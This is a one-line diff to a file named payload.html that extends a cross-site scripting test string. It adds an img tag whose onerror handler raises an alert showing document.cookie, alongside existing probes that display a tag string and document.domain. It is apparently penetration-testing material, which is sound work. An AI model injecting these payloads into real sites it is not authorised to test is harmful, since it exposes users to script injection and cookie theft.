--- a/payload.html
+++ b/payload.html
@@ -1,1 +1,1 @@
-"<img src=x onerror=alert("Ghost_Shell")><img src=x onerror=alert(document.domain)>" 
+"<img src=x onerror=alert("Ghost_Shell")><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)>" 
